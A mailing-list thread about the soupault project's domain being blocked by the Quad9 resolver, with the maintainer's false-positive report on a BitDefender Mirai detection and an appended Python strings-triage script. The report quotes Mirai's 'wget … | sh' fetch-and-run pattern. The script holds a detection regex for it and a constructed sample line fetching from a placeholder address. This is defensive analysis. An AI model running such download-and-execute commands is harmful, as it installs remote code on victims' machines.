Quad9 isn’t resolving the domain.

$ nslookup soupault.app 9.9.9.9

Are you using their DNS too? My current workaround is cloning the repo and reading its lightweight markup docs/manuals as needed.

dmbaturin, if this is the case, you'll wanna hit up Quad9’s contact form and ask to get unbanned.
--
toastal ไข่ดาว | https://toast.al
PGP: 7944 74b7 d236 dab9 c9ef e7f9 5cce 6f14 66d4 7c9e
I received the same results. But when
I went to my cellphone and switched it to
data the site showed up. A friend also
said it is working fine for her.
So I will figure out how to view it on my
laptops at some point. Eventually talk to
our home internet provider.
---
Aoirthoir An Broc
The Trickster G-ds,
The G-ds oph Mischiephs.
On 2023-06-21 23:38, toastal wrote:
> Quad9 isn’t resolving the domain.
>
> $ nslookup soupault.app 9.9.9.9
>
> Are you using their DNS too? My current workaround is cloning the repo
> and reading its lightweight markup docs/manuals as needed.
>
> dmbaturin, if this is the case, you'll wanna hit up Quad9’s contact
> form and ask to get unbanned.
Hi Aoirthoir and toastal,
That Quad9 stuff is a complete surprise to me.
It looks like the ban is spreading — it worked with 8.8.8.8 yesterday
but today it doesn't.
I've registered soupault.net in case it's the .app domain that caused
the problem.
There's a backlash against those Google domains that resemble
commonly-used file extensions (.app, .mov, and now .zip)
because malicious actors often use them to create deceptive links.
However, I'm going to wait for a response from Quad9 before setting up
A/AAAA records
and pointing the website to the new domain, just in case the current ban
of soupault.app will spread to the new domain as well.
Meanwhile, you can access the website by its Netlify address where it's
hosted: https://soupault.netlify.app/
Thanks for reporting the issue!
On 6/22/23 05:13, aoirthoir@aoirthoir.com wrote:
> I received the same results. But when
> I went to my cellphone and switched it to
> data the site showed up. A friend also
> said it is working fine for her.
>
> So i will figure out how to view it on my
> laptops at some point. eventually talk to
> our home internet provider.
> ---
> Aoirthoir An Broc
> The Trickster G-ds,
> The G-ds oph Mischiephs.
>
> On 2023-06-21 23:38, toastal wrote:
>> Quad9 isn’t resolving the domain.
>>
>> $ nslookup soupault.app 9.9.9.9
>>
>> Are you using their DNS too? My current workaround is cloning the repo
>> and reading its lightweight markup docs/manuals as needed.
>>
>> dmbaturin, if this is the case, you'll wanna hit up Quad9’s contact
>> form and ask to get unbanned.
Ok, I think I know where the root cause lies. Here's a copy of the
investigation notes that I sent to Quad9 in my blocklist removal request.
Dear Quad9 team,
soupault.app., the domain of my project, recently got blocked. I
appreciate your effort to keep the users safe, but in this case it's a
false positive.
You can view the website on Netlify: https://soupault.netlify.app
It's an open-source project with a four-year history of releases:
https://github.com/PataphysicalSociety/soupault — a static site
generator framework that is based on HTML element tree rewriting (as
opposed to Jekyll or Hugo that treat HTML as an opaque format).
I suppose one reason for the block may be that one antivirus software
vendor (BitDefender) flagged the Linux executable of the latest release
as malware.
This report shows that BitDefender thinks it's infected with Mirai:
https://www.virustotal.com/gui/file/e044a7a309e38516e536799d7e869a00ade637ca4079764bf8aeb1620c72f652/detection
However, no other vendor detects anything wrong there, and macOS and
Windows executables that are built from the same source code and the
same third-party libraries don't raise any alarms.
* Windows:
https://www.virustotal.com/gui/file/0883e2e7d844cfc71f82ea87466908f40f401927b3236a01248f9f65415d8eef/detection
* macOS:
https://www.virustotal.com/gui/file/b0777f5c940a28da2994f643d5eaad230cbbc4262a063183f2b1426983704abc/detection
I also checked the executable to rule out a possible supply chain attack
through a third-party library. My checks with strings, objdump, and
strace show that it doesn't contain any data (like command and control
server addresses) and doesn't make any system calls I don't expect it to
make.
In fact, it doesn't make any network connections at all — as it should,
being a static site generator. Actual Mirai samples I could find use
"wget <c&c server> | sh" to get the payload, and they are detected by
multiple vendors.
(Of course, I didn't intentionally include any malicious code in the
project. Since it's open-source, everyone is free to confirm that.)
Finally, re-compiling the executable with GNU libc instead of musl makes
it pass the BitDefender check, and checking the musl library file from
the package I use (musl-libc-static-1.2.3-2.fc37.x86_64) also doesn't
raise any alarms.
If you need the file in question to forward to the threat intelligence
provider, you can get it from
https://github.com/PataphysicalSociety/soupault/releases/download/4.6.0/soupault-4.6.0-linux-x86_64.tar.gz
Thanks in advance,
Daniil
On 6/22/23 05:13, aoirthoir@aoirthoir.com wrote:
> I received the same results. But when
> I went to my cellphone and switched it to
> data the site showed up. A friend also
> said it is working fine for her.
>
> So i will figure out how to view it on my
> laptops at some point. eventually talk to
> our home internet provider.
> ---
> Aoirthoir An Broc
> The Trickster G-ds,
> The G-ds oph Mischiephs.
>
> On 2023-06-21 23:38, toastal wrote:
>> Quad9 isn’t resolving the domain.
>>
>> $ nslookup soupault.app 9.9.9.9
>>
>> Are you using their DNS too? My current workaround is cloning the repo
>> and reading its lightweight markup docs/manuals as needed.
>>
>> dmbaturin, if this is the case, you'll wanna hit up Quad9’s contact
>> form and ask to get unbanned.
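
The strings check mentioned in the message above (looking for embedded server addresses or a download-and-run command) can be sketched as follows. This is an added example, not the author's script and not part of the original thread; the function names and both sample byte strings are constructed for illustration, 192.0.2.10 is a documentation-only address, and it covers only the static strings step, not the objdump or strace checks.

```python
import re

URL_RE = re.compile(r"\b(?:https?|ftp|tftp)://[^\s\"'<>|]+")
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
# A download piped into a shell, the pattern the message attributes to Mirai samples.
FETCH_EXEC_RE = re.compile(r"\b(?:wget|curl|tftp)\b[^\n]*\|\s*(?:ba)?sh\b")


def extract_strings(data, min_len=6):
    """Return printable-ASCII runs of at least min_len bytes, like strings(1)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def valid_ipv4(text):
    """Reject dotted quads with an octet above 255 (e.g. long version numbers)."""
    return all(int(octet) <= 255 for octet in text.split("."))


def triage(data):
    """Collect network indicators found in a binary's embedded strings."""
    report = {"url": set(), "ipv4": set(), "fetch_exec": set()}
    for s in extract_strings(data):
        report["url"].update(URL_RE.findall(s))
        report["ipv4"].update(ip for ip in IPV4_RE.findall(s) if valid_ipv4(ip))
        if FETCH_EXEC_RE.search(s):
            report["fetch_exec"].add(s)
    return {kind: sorted(found) for kind, found in report.items()}


# Constructed samples: neither is taken from a real binary.
CLEAN_SAMPLE = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
    + b"soupault 4.6.0\x00soupault.toml\x00site/index.html\x00"
)
SUSPICIOUS_SAMPLE = (
    b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8
    + b"/bin/busybox\x00wget http://192.0.2.10/ | sh\x00"
)

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_SAMPLE), ("suspicious", SUSPICIOUS_SAMPLE)):
        print(name, triage(blob))
```

An empty report does not prove a binary is clean, since indicators can be encoded or packed; it is one input alongside the system-call and network observations the message describes.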